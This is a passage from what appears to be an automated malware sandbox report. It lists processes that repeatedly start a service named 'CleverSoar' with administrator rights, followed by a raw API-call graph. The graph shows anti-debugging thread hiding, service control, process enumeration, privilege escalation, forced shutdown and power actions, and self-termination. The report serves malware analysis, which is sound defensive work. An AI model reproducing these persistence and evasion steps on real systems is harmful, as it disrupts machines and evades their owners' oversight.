                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:107
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:108
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:109
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:110
                              Start time:23:06:18
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Reset < >

                                Execution Graph

                                Execution Coverage:2.3%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:15.5%
                                Total number of Nodes:818
                                Total number of Limit Nodes:9
                                execution_graph 65886 6ca1cad3 65887 6ca1cafd 65886->65887 65888 6ca1cae5 __dosmaperr 65886->65888 65887->65888 65890 6ca1cb48 __dosmaperr 65887->65890 65891 6ca1cb77 65887->65891 65933 6ca10120 18 API calls __cftoe 65890->65933 65892 6ca1cb90 65891->65892 65893 6ca1cbe7 __wsopen_s 65891->65893 65894 6ca1cbab __dosmaperr 65891->65894 65892->65894 65913 6ca1cb95 65892->65913 65927 6ca147bb HeapFree GetLastError __dosmaperr 65893->65927 65926 6ca10120 18 API calls __cftoe 65894->65926 65896 6ca1cd3e 65900 6ca1cdb4 65896->65900 65903 6ca1cd57 GetConsoleMode 65896->65903 65898 6ca1cc07 65928 6ca147bb HeapFree GetLastError __dosmaperr 65898->65928 65902 6ca1cdb8 ReadFile 65900->65902 65905 6ca1cdd2 65902->65905 65906 6ca1ce2c GetLastError 65902->65906 65903->65900 65907 6ca1cd68 65903->65907 65904 6ca1cc0e 65919 6ca1cbc2 __dosmaperr __wsopen_s 65904->65919 65929 6ca1ac69 20 API calls __wsopen_s 65904->65929 65905->65906 65908 6ca1cda9 65905->65908 65906->65919 65907->65902 65909 6ca1cd6e ReadConsoleW 65907->65909 65914 6ca1cdf7 65908->65914 65915 6ca1ce0e 65908->65915 65908->65919 65909->65908 65912 6ca1cd8a GetLastError 65909->65912 65912->65919 65921 6ca219e5 65913->65921 65931 6ca1cefe 23 API calls 3 library calls 65914->65931 65916 6ca1ce25 65915->65916 65915->65919 65932 6ca1d1b6 21 API calls __wsopen_s 65916->65932 65930 6ca147bb HeapFree GetLastError __dosmaperr 65919->65930 65920 6ca1ce2a 65920->65919 65922 6ca219ff 65921->65922 65924 6ca219f2 65921->65924 65923 6ca21a0b 65922->65923 65934 6ca10120 18 API calls __cftoe 65922->65934 65923->65896 65924->65896 65926->65919 65927->65898 65928->65904 65929->65913 65930->65888 65931->65919 65932->65920 65933->65888 65934->65924 65935 6c883d62 65937 6c883bc0 65935->65937 65936 6c883e8a GetCurrentThread NtSetInformationThread 65938 6c883eea 65936->65938 65937->65936 65939 6c884b53 66097 6ca06a43 65939->66097 65941 6c884b5c _Yarn 66111 6c9faec0 65941->66111 65943 6c8a639e 66209 6ca10130 18 API calls 2 library calls 65943->66209 65945 6c884cff 65946 6c885164 CreateFileA CloseHandle 65951 6c8851ec 65946->65951 65947 6c884bae std::ios_base::_Ios_base_dtor 65947->65943 65947->65945 65947->65946 65948 6c89245a _Yarn _strlen 65947->65948 65948->65943 65950 6c9faec0 2 API calls 65948->65950 65965 6c892a83 std::ios_base::_Ios_base_dtor 65950->65965 66117 6ca05120 OpenSCManagerA 65951->66117 65953 6c88fc00 66202 6ca05240 CreateToolhelp32Snapshot 65953->66202 65956 6ca06a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 65992 6c885478 std::ios_base::_Ios_base_dtor _Yarn _strlen 65956->65992 65958 6c8937d0 Sleep 66003 6c8937e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 65958->66003 65959 6c9faec0 2 API calls 65959->65992 65960 6c8a63b2 66210 6c8815e0 18 API calls std::ios_base::_Ios_base_dtor 65960->66210 65961 6ca05240 4 API calls 65979 6c89053a 65961->65979 65962 6ca05240 4 API calls 65985 6c8912e2 65962->65985 65964 6c8a64f8 65965->65943 66121 6c9f0390 65965->66121 65966 6c88ffe3 65966->65961 65970 6c890abc 65966->65970 65967 6c8a6ba0 104 API calls 65967->65992 65968 6c8a6e60 32 API calls 65968->65992 65970->65948 65970->65962 65972 6ca05240 4 API calls 65972->65970 65973 6ca05240 4 API calls 65993 6c891dd9 65973->65993 65974 6c89211c 65974->65948 65975 6c89241a 65974->65975 65978 6c9f0390 11 API calls 65975->65978 65976 6c9faec0 2 API calls 65976->66003 65981 6c89244d 65978->65981 65979->65970 65979->65972 65980 6c886722 66178 6ca01880 25 API calls 4 library calls 65980->66178 66208 6ca05d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 65981->66208 65983 6c892452 Sleep 65983->65948 65984 6c8916ac 65985->65973 65985->65974 65985->65984 65986 6c886162 65987 6c88740b 66179 6ca04ff0 CreateProcessA 65987->66179 65989 6ca05240 4 API calls 65989->65974 65992->65943 65992->65953 65992->65956 65992->65959 65992->65967 65992->65968 65992->65980 65992->65986 66159 6c8a7090 65992->66159 66172 6c8ce010 65992->66172 65993->65974 65993->65989 65994 6c8a7090 77 API calls 65994->66003 65995 6c8ce010 67 API calls 65995->66003 65996 6c88775a _strlen 65996->65943 65997 6c887ba9 65996->65997 65998 6c887b92 65996->65998 66001 6c887b43 _Yarn 65996->66001 66000 6ca06a43 std::_Facet_Register 4 API calls 65997->66000 65999 6ca06a43 std::_Facet_Register 4 API calls 65998->65999 65999->66001 66000->66001 66002 6c9faec0 2 API calls 66001->66002 66012 6c887be7 std::ios_base::_Ios_base_dtor 66002->66012 66003->65943 66003->65976 66003->65994 66003->65995 66130 6c8a6ba0 66003->66130 66149 6c8a6e60 66003->66149 66004 6ca04ff0 4 API calls 66015 6c888a07 66004->66015 66005 6c889d68 66008 6ca06a43 std::_Facet_Register 4 API calls 66005->66008 66006 6c889d7f 66009 6ca06a43 std::_Facet_Register 4 API calls 66006->66009 66007 6c88962c _strlen 66007->65943 66007->66005 66007->66006 66010 6c889d18 _Yarn 66007->66010 66008->66010 66009->66010 66011 6c9faec0 2 API calls 66010->66011 66018 6c889dbd std::ios_base::_Ios_base_dtor 66011->66018 66012->65943 66012->66004 66012->66007 66013 6c888387 66012->66013 66014 6ca04ff0 4 API calls 66023 6c889120 66014->66023 66015->66014 66016 6ca04ff0 4 API calls 66033 6c88a215 _strlen 66016->66033 66017 6ca04ff0 4 API calls 66020 6c889624 66017->66020 66018->65943 66018->66016 66024 6c88e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 66018->66024 66019 6ca06a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66019->66024 66183 6ca05d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66020->66183 66022 6c9faec0 2 API calls 66022->66024 66023->66017 66024->65943 66024->66019 66024->66022 66025 6c88f7b1 66024->66025 66026 6c88ed02 Sleep 66024->66026 66201 6ca05d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66025->66201 66045 6c88e8c1 66026->66045 66028 6c88a9bb 66032 6ca06a43 std::_Facet_Register 4 API calls 66028->66032 66029 6c88a9a4 66031 6ca06a43 std::_Facet_Register 4 API calls 66029->66031 66030 6c88e8dd GetCurrentProcess TerminateProcess 66030->66024 66040 6c88a953 _Yarn _strlen 66031->66040 66032->66040 66033->65943 66033->66028 66033->66029 66033->66040 66034 6ca04ff0 4 API calls 66034->66045 66035 6c88fbb8 66036 6c88fbe8 ExitWindowsEx Sleep 66035->66036 66036->65953 66037 6c88f7c0 66037->66035 66038 6c88b009 66042 6ca06a43 std::_Facet_Register 4 API calls 66038->66042 66039 6c88aff0 66041 6ca06a43 std::_Facet_Register 4 API calls 66039->66041 66040->65960 66040->66038 66040->66039 66043 6c88afa0 _Yarn 66040->66043 66041->66043 66042->66043 66184 6ca05960 66043->66184 66045->66024 66045->66030 66045->66034 66046 6c88b059 std::ios_base::_Ios_base_dtor _strlen 66046->65943 66047 6c88b42c 66046->66047 66048 6c88b443 66046->66048 66051 6c88b3da _Yarn _strlen 66046->66051 66049 6ca06a43 std::_Facet_Register 4 API calls 66047->66049 66050 6ca06a43 std::_Facet_Register 4 API calls 66048->66050 66049->66051 66050->66051 66051->65960 66052 6c88b79e 66051->66052 66053 6c88b7b7 66051->66053 66056 6c88b751 _Yarn 66051->66056 66054 6ca06a43 std::_Facet_Register 4 API calls 66052->66054 66055 6ca06a43 std::_Facet_Register 4 API calls 66053->66055 66054->66056 66055->66056 66057 6ca05960 104 API calls 66056->66057 66058 6c88b804 std::ios_base::_Ios_base_dtor _strlen 66057->66058 66058->65943 66059 6c88bc0f 66058->66059 66060 6c88bc26 66058->66060 66063 6c88bbbd _Yarn _strlen 66058->66063 66061 6ca06a43 std::_Facet_Register 4 API calls 66059->66061 66062 6ca06a43 std::_Facet_Register 4 API calls 66060->66062 66061->66063 66062->66063 66063->65960 66064 6c88c08e 66063->66064 66065 6c88c075 66063->66065 66068 6c88c028 _Yarn 66063->66068 66067 6ca06a43 std::_Facet_Register 4 API calls 66064->66067 66066 6ca06a43 std::_Facet_Register 4 API calls 66065->66066 66066->66068 66067->66068 66069 6ca05960 104 API calls 66068->66069 66074 6c88c0db std::ios_base::_Ios_base_dtor _strlen 66069->66074 66070 6c88c7bc 66073 6ca06a43 std::_Facet_Register 4 API calls 66070->66073 66071 6c88c7a5 66072 6ca06a43 std::_Facet_Register 4 API calls 66071->66072 66081 6c88c753 _Yarn _strlen 66072->66081 66073->66081 66074->65943 66074->66070 66074->66071 66074->66081 66075 6c88d3ed 66077 6ca06a43 std::_Facet_Register 4 API calls 66075->66077 66076 6c88d406 66078 6ca06a43 std::_Facet_Register 4 API calls 66076->66078 66079 6c88d39a _Yarn 66077->66079 66078->66079 66080 6ca05960 104 API calls 66079->66080 66082 6c88d458 std::ios_base::_Ios_base_dtor _strlen 66080->66082 66081->65960 66081->66075 66081->66076 66081->66079 66087 6c88cb2f 66081->66087 66082->65943 66083 6c88d8bb 66082->66083 66084 6c88d8a4 66082->66084 66088 6c88d852 _Yarn _strlen 66082->66088 66086 6ca06a43 std::_Facet_Register 4 API calls 66083->66086 66085 6ca06a43 std::_Facet_Register 4 API calls 66084->66085 66085->66088 66086->66088 66088->65960 66089 6c88dccf 66088->66089 66090 6c88dcb6 66088->66090 66093 6c88dc69 _Yarn 66088->66093 66092 6ca06a43 std::_Facet_Register 4 API calls 66089->66092 66091 6ca06a43 std::_Facet_Register 4 API calls 66090->66091 66091->66093 66092->66093 66094 6ca05960 104 API calls 66093->66094 66096 6c88dd1c std::ios_base::_Ios_base_dtor 66094->66096 66095 6ca04ff0 4 API calls 66095->66024 66096->65943 66096->66095 66099 6ca06a48 66097->66099 66098 6ca06a62 66098->65941 66099->66098 66102 6ca06a64 std::_Facet_Register 66099->66102 66211 6ca0f014 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 66099->66211 66101 6ca078c3 std::_Facet_Register 66215 6ca09379 RaiseException 66101->66215 66102->66101 66212 6ca09379 RaiseException 66102->66212 66104 6ca080bc IsProcessorFeaturePresent 66110 6ca080e1 66104->66110 66106 6ca07883 66213 6ca09379 RaiseException 66106->66213 66108 6ca078a3 std::invalid_argument::invalid_argument 66214 6ca09379 RaiseException 66108->66214 66110->65941 66112 6c9faed6 FindFirstFileA 66111->66112 66113 6c9faed4 66111->66113 66114 6c9faf10 66112->66114 66113->66112 66115 6c9faf14 FindClose 66114->66115 66116 6c9faf72 66114->66116 66115->66114 66116->65947 66118 6ca05156 66117->66118 66119 6ca051e8 OpenServiceA 66118->66119 66120 6ca0522f 66118->66120 66119->66118 66120->65992 66126 6c9f03a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 66121->66126 66122 6c9f3f5f CloseHandle 66122->66126 66123 6c9f310e CloseHandle 66123->66126 66124 6c8937cb 66129 6ca05d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 66124->66129 66125 6c9f251b CloseHandle 66125->66126 66126->66122 66126->66123 66126->66124 66126->66125 66128 6c9dc1e0 WriteFile WriteFile WriteFile ReadFile 66126->66128 66216 6c9db730 66126->66216 66128->66126 66129->65958 66131 6c8a6bd5 66130->66131 66227 6c8d2020 66131->66227 66133 6c8a6c68 66134 6ca06a43 std::_Facet_Register 4 API calls 66133->66134 66135 6c8a6ca0 66134->66135 66244 6ca07327 66135->66244 66137 6c8a6cb4 66256 6c8d1d90 66137->66256 66140 6c8a6d8e 66140->66003 66142 6c8a6dc8 66264 6c8d26e0 24 API calls 4 library calls 66142->66264 66144 6c8a6dda 66265 6ca09379 RaiseException 66144->66265 66146 6c8a6def 66147 6c8ce010 67 API calls 66146->66147 66148 6c8a6e0f 66147->66148 66148->66003 66151 6c8a6e9f 66149->66151 66150 6c8a6eb3 66152 6c8a6f5b 66150->66152 66657 6c8d2250 30 API calls 66150->66657 66658 6c8d26e0 24 API calls 4 library calls 66150->66658 66659 6ca09379 RaiseException 66150->66659 66151->66150 66655 6c8d3560 32 API calls std::_Xinvalid_argument 66151->66655 66156 6c8a6f6e 66152->66156 66656 6c8d37e0 32 API calls std::_Xinvalid_argument 66152->66656 66156->66003 66160 6c8a709e 66159->66160 66164 6c8a70d1 66159->66164 66660 6c8d01f0 66160->66660 66162 6c8a7183 66162->65992 66164->66162 66664 6c8d2250 30 API calls 66164->66664 66165 6ca10b18 67 API calls 66165->66164 66167 6c8a71ae 66665 6c8d2340 24 API calls 66167->66665 66169 6c8a71be 66666 6ca09379 RaiseException 66169->66666 66171 6c8a71c9 66173 6c8ce04b 66172->66173 66174 6c8ce0a3 66173->66174 66175 6c8d01f0 64 API calls 66173->66175 66174->65992 66176 6c8ce098 66175->66176 66177 6ca10b18 67 API calls 66176->66177 66177->66174 66178->65987 66181 6ca050ca 66179->66181 66180 6ca05080 WaitForSingleObject CloseHandle CloseHandle 66180->66181 66181->66180 66182 6ca050e3 66181->66182 66182->65996 66183->66007 66185 6ca059b7 66184->66185 66712 6ca05ff0 66185->66712 66187 6ca059c8 66188 6c8a6ba0 104 API calls 66187->66188 66192 6ca059ec 66188->66192 66189 6c8ce010 67 API calls 66190 6ca05a9f std::ios_base::_Ios_base_dtor 66189->66190 66194 6c8ce010 67 API calls 66190->66194 66193 6ca05a54 66192->66193 66200 6ca05a67 66192->66200 66731 6ca06340 66192->66731 66739 6c8e2000 66192->66739 66749 6ca05b90 66193->66749 66197 6ca05ae2 std::ios_base::_Ios_base_dtor 66194->66197 66197->66046 66198 6ca05a5c 66199 6c8a7090 77 API calls 66198->66199 66199->66200 66200->66189 66201->66037 66203 6ca052a0 std::locale::_Setgloballocale 66202->66203 66204 6ca05277 CloseHandle 66203->66204 66205 6ca05320 Process32NextW 66203->66205 66206 6ca053b1 66203->66206 66207 6ca05345 Process32FirstW 66203->66207 66204->66203 66205->66203 66206->65966 66207->66203 66208->65983 66210->65964 66211->66099 66212->66106 66213->66108 66214->66101 66215->66104 66217 6c9db743 _Yarn __wsopen_s std::locale::_Setgloballocale 66216->66217 66218 6c9dc180 66217->66218 66219 6c9dbced CreateFileA 66217->66219 66221 6c9daa30 66217->66221 66218->66126 66219->66217 66222 6c9daa43 __wsopen_s std::locale::_Setgloballocale 66221->66222 66223 6c9db3e9 WriteFile 66222->66223 66224 6c9db43d WriteFile 66222->66224 66225 6c9db718 66222->66225 66226 6c9dab95 ReadFile 66222->66226 66223->66222 66224->66222 66225->66217 66226->66222 66228 6ca06a43 std::_Facet_Register 4 API calls 66227->66228 66229 6c8d207e 66228->66229 66230 6ca07327 43 API calls 66229->66230 66231 6c8d2092 66230->66231 66266 6c8d2f60 42 API calls 4 library calls 66231->66266 66233 6c8d210d 66236 6c8d2120 66233->66236 66267 6ca06f8e 9 API calls 2 library calls 66233->66267 66234 6c8d20c8 66234->66233 66235 6c8d2136 66234->66235 66268 6c8d2250 30 API calls 66235->66268 66236->66133 66239 6c8d215b 66269 6c8d2340 24 API calls 66239->66269 66241 6c8d2171 66270 6ca09379 RaiseException 66241->66270 66243 6c8d217c 66243->66133 66245 6ca07333 __EH_prolog3 66244->66245 66271 6ca06eb5 66245->66271 66250 6ca07351 66285 6ca073ba 39 API calls std::locale::_Setgloballocale 66250->66285 66251 6ca073ac 66251->66137 66253 6ca07359 66286 6ca071b1 HeapFree GetLastError _Yarn ___std_exception_destroy 66253->66286 66255 6ca0736f 66277 6ca06ee6 66255->66277 66257 6c8d1ddc 66256->66257 66258 6c8a6d5d 66256->66258 66291 6ca07447 66257->66291 66258->66140 66263 6c8d2250 30 API calls 66258->66263 66262 6c8d1e82 66263->66142 66264->66144 66265->66146 66266->66234 66267->66236 66268->66239 66269->66241 66270->66243 66272 6ca06ec4 66271->66272 66274 6ca06ecb 66271->66274 66287 6ca103cd 6 API calls std::_Lockit::_Lockit 66272->66287 66275 6ca06ec9 66274->66275 66288 6ca0858b EnterCriticalSection 66274->66288 66275->66255 66284 6ca07230 6 API calls 2 library calls 66275->66284 66278 6ca06ef0 66277->66278 66279 6ca103db 66277->66279 66280 6ca06f03 66278->66280 66289 6ca08599 LeaveCriticalSection 66278->66289 66290 6ca103b6 LeaveCriticalSection 66279->66290 66280->66251 66283 6ca103e2 66283->66251 66284->66250 66285->66253 66286->66255 66287->66275 66288->66275 66289->66280 66290->66283 66292 6ca07450 66291->66292 66293 6c8d1dea 66292->66293 66300 6ca0fd4a 66292->66300 66293->66258 66299 6ca0c563 18 API calls __cftoe 66293->66299 66295 6ca0749c 66295->66293 66311 6ca0fa58 65 API calls 66295->66311 66297 6ca074b7 66297->66293 66312 6ca10b18 66297->66312 66299->66262 66302 6ca0fd55 __wsopen_s 66300->66302 66301 6ca0fd68 66337 6ca10120 18 API calls __cftoe 66301->66337 66302->66301 66303 6ca0fd88 66302->66303 66310 6ca0fd78 66303->66310 66323 6ca1ae0c 66303->66323 66310->66295 66311->66297 66313 6ca10b24 __wsopen_s 66312->66313 66314 6ca10b43 66313->66314 66316 6ca10b2e 66313->66316 66321 6ca10b3e 66314->66321 66518 6ca0c5a9 EnterCriticalSection 66314->66518 66533 6ca10120 18 API calls __cftoe 66316->66533 66317 6ca10b60 66519 6ca10b9c 66317->66519 66320 6ca10b6b 66534 6ca10b92 LeaveCriticalSection 66320->66534 66321->66293 66324 6ca1ae18 __wsopen_s 66323->66324 66339 6ca1039f EnterCriticalSection 66324->66339 66326 6ca1ae26 66340 6ca1aeb0 66326->66340 66331 6ca1af72 66332 6ca1b091 66331->66332 66364 6ca1b114 66332->66364 66335 6ca0fdcc 66338 6ca0fdf5 LeaveCriticalSection 66335->66338 66337->66310 66338->66310 66339->66326 66348 6ca1aed3 66340->66348 66341 6ca1ae33 66354 6ca1ae6c 66341->66354 66342 6ca1af2b 66359 6ca171e5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 66342->66359 66344 6ca1af34 66360 6ca147bb HeapFree GetLastError __dosmaperr 66344->66360 66347 6ca1af3d 66347->66341 66361 6ca16c1f 6 API calls std::_Lockit::_Lockit 66347->66361 66348->66341 66348->66342 66348->66348 66357 6ca0c5a9 EnterCriticalSection 66348->66357 66358 6ca0c5bd LeaveCriticalSection 66348->66358 66350 6ca1af5c 66362 6ca0c5a9 EnterCriticalSection 66350->66362 66353 6ca1af6f 66353->66341 66363 6ca103b6 LeaveCriticalSection 66354->66363 66356 6ca0fda3 66356->66310 66356->66331 66357->66348 66358->66348 66359->66344 66360->66347 66361->66350 66362->66353 66363->66356 66365 6ca1b133 66364->66365 66366 6ca1b146 66365->66366 66368 6ca1b15b 66365->66368 66380 6ca10120 18 API calls __cftoe 66366->66380 66370 6ca1b27b 66368->66370 66381 6ca23ea8 37 API calls __cftoe 66368->66381 66369 6ca1b0a7 66369->66335 66377 6ca23fde 66369->66377 66370->66369 66384 6ca10120 18 API calls __cftoe 66370->66384 66373 6ca1b2cb 66373->66370 66382 6ca23ea8 37 API calls __cftoe 66373->66382 66375 6ca1b2e9 66375->66370 66383 6ca23ea8 37 API calls __cftoe 66375->66383 66385 6ca24396 66377->66385 66380->66369 66381->66373 66382->66375 66383->66370 66384->66369 66387 6ca243a2 __wsopen_s 66385->66387 66386 6ca243a9 66403 6ca10120 18 API calls __cftoe 66386->66403 66387->66386 66388 6ca243d4 66387->66388 66394 6ca23ffe 66388->66394 66393 6ca23ff9 66393->66335 66405 6ca106cb 66394->66405 66399 6ca24034 66402 6ca24066 66399->66402 66445 6ca147bb HeapFree GetLastError __dosmaperr 66399->66445 66404 6ca2442b LeaveCriticalSection __wsopen_s 66402->66404 66403->66393 66404->66393 66446 6ca0bceb 66405->66446 66408 6ca106ef 66410 6ca0bdf6 66408->66410 66455 6ca0be4e 66410->66455 66412 6ca0be0e 66412->66399 66413 6ca2406c 66412->66413 66470 6ca244ec 66413->66470 66418 6ca2409e __dosmaperr 66418->66399 66420 6ca24192 GetFileType 66421 6ca241e4 66420->66421 66422 6ca2419d GetLastError 66420->66422 66500 6ca217b0 SetStdHandle __dosmaperr __wsopen_s 66421->66500 66499 6ca0f9f2 __dosmaperr 66422->66499 66423 6ca24167 GetLastError 66423->66418 66425 6ca24115 66425->66420 66425->66423 66498 6ca24457 CreateFileW 66425->66498 66426 6ca241ab CloseHandle 66426->66418 66428 6ca241d4 66426->66428 66428->66418 66430 6ca2415a 66430->66420 66430->66423 66431 6ca24205 66432 6ca24251 66431->66432 66501 6ca24666 70 API calls 2 library calls 66431->66501 66436 6ca24258 66432->66436 66515 6ca24710 70 API calls 2 library calls 66432->66515 66435 6ca24286 66435->66436 66437 6ca24294 66435->66437 66502 6ca1b925 66436->66502 66437->66418 66439 6ca24310 CloseHandle 66437->66439 66516 6ca24457 CreateFileW 66439->66516 66441 6ca2433b 66441->66428 66442 6ca24345 GetLastError 66441->66442 66443 6ca24351 __dosmaperr 66442->66443 66517 6ca2171f SetStdHandle __dosmaperr __wsopen_s 66443->66517 66445->66402 66447 6ca0bd0b 66446->66447 66453 6ca0bd02 66446->66453 66448 6ca149b2 __Getctype 37 API calls 66447->66448 66447->66453 66449 6ca0bd2b 66448->66449 66450 6ca14f28 __Getctype 37 API calls 66449->66450 66451 6ca0bd41 66450->66451 66452 6ca14f55 __cftoe 37 API calls 66451->66452 66452->66453 66453->66408 66454 6ca169d5 5 API calls std::_Lockit::_Lockit 66453->66454 66454->66408 66456 6ca0be76 66455->66456 66457 6ca0be5c 66455->66457 66458 6ca0be9c 66456->66458 66459 6ca0be7d 66456->66459 66460 6ca0bddc __wsopen_s HeapFree GetLastError 66457->66460 66461 6ca14843 __fassign MultiByteToWideChar 66458->66461 66462 6ca0bd9d __wsopen_s HeapFree GetLastError 66459->66462 66464 6ca0be66 __dosmaperr 66459->66464 66460->66464 66463 6ca0beab 66461->66463 66462->66464 66465 6ca0beb2 GetLastError 66463->66465 66466 6ca0bed8 66463->66466 66467 6ca0bd9d __wsopen_s HeapFree GetLastError 66463->66467 66464->66412 66465->66464 66466->66464 66468 6ca14843 __fassign MultiByteToWideChar 66466->66468 66467->66466 66469 6ca0beef 66468->66469 66469->66464 66469->66465 66471 6ca24527 66470->66471 66473 6ca2450d 66470->66473 66472 6ca2447c __wsopen_s 18 API calls 66471->66472 66477 6ca2455f 66472->66477 66473->66471 66474 6ca10120 __cftoe 18 API calls 66473->66474 66474->66471 66475 6ca2458e 66476 6ca25911 __wsopen_s 18 API calls 66475->66476 66481 6ca24089 66475->66481 66478 6ca245dc 66476->66478 66477->66475 66480 6ca10120 __cftoe 18 API calls 66477->66480 66479 6ca24659 66478->66479 66478->66481 66482 6ca1014d __Getctype 11 API calls 66479->66482 66480->66475 66481->66418 66484 6ca2160c 66481->66484 66483 6ca24665 66482->66483 66485 6ca21618 __wsopen_s 66484->66485 66486 6ca1039f std::_Lockit::_Lockit EnterCriticalSection 66485->66486 66487 6ca2161f 66486->66487 66488 6ca21644 66487->66488 66492 6ca216b3 EnterCriticalSection 66487->66492 66495 6ca21666 66487->66495 66491 6ca21842 __wsopen_s 11 API calls 66488->66491 66489 6ca21716 __wsopen_s LeaveCriticalSection 66490 6ca21686 66489->66490 66490->66418 66497 6ca24457 CreateFileW 66490->66497 66493 6ca21649 66491->66493 66494 6ca216c0 LeaveCriticalSection 66492->66494 66492->66495 66493->66495 66496 6ca21990 __wsopen_s EnterCriticalSection 66493->66496 66494->66487 66495->66489 66496->66495 66497->66425 66498->66430 66499->66426 66500->66431 66501->66432 66503 6ca215a2 __wsopen_s 18 API calls 66502->66503 66505 6ca1b935 66503->66505 66504 6ca1b93b 66506 6ca2171f __wsopen_s SetStdHandle 66504->66506 66505->66504 66507 6ca1b96d 66505->66507 66509 6ca215a2 __wsopen_s 18 API calls 66505->66509 66514 6ca1b993 __dosmaperr 66506->66514 66507->66504 66508 6ca215a2 __wsopen_s 18 API calls 66507->66508 66511 6ca1b979 CloseHandle 66508->66511 66510 6ca1b964 66509->66510 66512 6ca215a2 __wsopen_s 18 API calls 66510->66512 66511->66504 66513 6ca1b985 GetLastError 66511->66513 66512->66507 66513->66504 66514->66418 66515->66435 66516->66441 66517->66428 66518->66317 66520 6ca10ba9 66519->66520 66521 6ca10bbe 66519->66521 66557 6ca10120 18 API calls __cftoe 66520->66557 66531 6ca10bb9 66521->66531 66535 6ca10cb9 66521->66535 66528 6ca10be1 66550 6ca1b898 66528->66550 66530 6ca10be7 66530->66531 66558 6ca147bb HeapFree GetLastError __dosmaperr 66530->66558 66531->66320 66533->66321 66534->66321 66536 6ca10cd1 66535->66536 66540 6ca10bd3 66535->66540 66537 6ca19c60 18 API calls 66536->66537 66536->66540 66538 6ca10cef 66537->66538 66559 6ca1bb6c 66538->66559 66541 6ca1873e 66540->66541 66542 6ca18755 66541->66542 66543 6ca10bdb 66541->66543 66542->66543 66642 6ca147bb HeapFree GetLastError __dosmaperr 66542->66642 66545 6ca19c60 66543->66545 66546 6ca19c81 66545->66546 66547 6ca19c6c 66545->66547 66546->66528 66643 6ca10120 18 API calls __cftoe 66547->66643 66549 6ca19c7c 66549->66528 66551 6ca1b8be 66550->66551 66552 6ca1b8a9 __dosmaperr 66550->66552 66553 6ca1b8e5 66551->66553 66554 6ca1b907 __dosmaperr 66551->66554 66552->66530 66644 6ca1b9c1 66553->66644 66652 6ca10120 18 API calls __cftoe 66554->66652 66557->66531 66558->66531 66560 6ca1bb78 __wsopen_s 66559->66560 66561 6ca1bb80 __dosmaperr 66560->66561 66562 6ca1bbca 66560->66562 66564 6ca1bc33 __dosmaperr 66560->66564 66561->66540 66570 6ca21990 EnterCriticalSection 66562->66570 66600 6ca10120 18 API calls __cftoe 66564->66600 66565 6ca1bbd0 66566 6ca1bbec __dosmaperr 66565->66566 66571 6ca1bc5e 66565->66571 66599 6ca1bc2b LeaveCriticalSection __wsopen_s 66566->66599 66570->66565 66572 6ca1bc80 66571->66572 66595 6ca1bc9c __dosmaperr 66571->66595 66573 6ca1bcd4 66572->66573 66575 6ca1bc84 __dosmaperr 66572->66575 66574 6ca1bce7 66573->66574 66609 6ca1ac69 20 API calls __wsopen_s 66573->66609 66601 6ca1be40 66574->66601 66608 6ca10120 18 API calls __cftoe 66575->66608 66580 6ca1bcfd 66584 6ca1bd01 66580->66584 66585 6ca1bd26 66580->66585 66581 6ca1bd3c 66582 6ca1bd50 66581->66582 66583 6ca1bd95 WriteFile 66581->66583 66588 6ca1bd85 66582->66588 66589 6ca1bd5b 66582->66589 66586 6ca1bdb9 GetLastError 66583->66586 66583->66595 66584->66595 66610 6ca1c25b 6 API calls __wsopen_s 66584->66610 66611 6ca1beb1 43 API calls 5 library calls 66585->66611 66586->66595 66614 6ca1c2c3 7 API calls 2 library calls 66588->66614 66590 6ca1bd60 66589->66590 66591 6ca1bd75 66589->66591 66590->66595 66596 6ca1bd65 66590->66596 66613 6ca1c487 8 API calls 3 library calls 66591->66613 66594 6ca1bd73 66594->66595 66595->66566 66612 6ca1c39e 7 API calls 2 library calls 66596->66612 66599->66561 66600->66561 66602 6ca219e5 __wsopen_s 18 API calls 66601->66602 66603 6ca1be51 66602->66603 66607 6ca1bcf8 66603->66607 66615 6ca149b2 GetLastError 66603->66615 66606 6ca1be8e GetConsoleMode 66606->66607 66607->66580 66607->66581 66608->66595 66609->66574 66610->66595 66611->66595 66612->66594 66613->66594 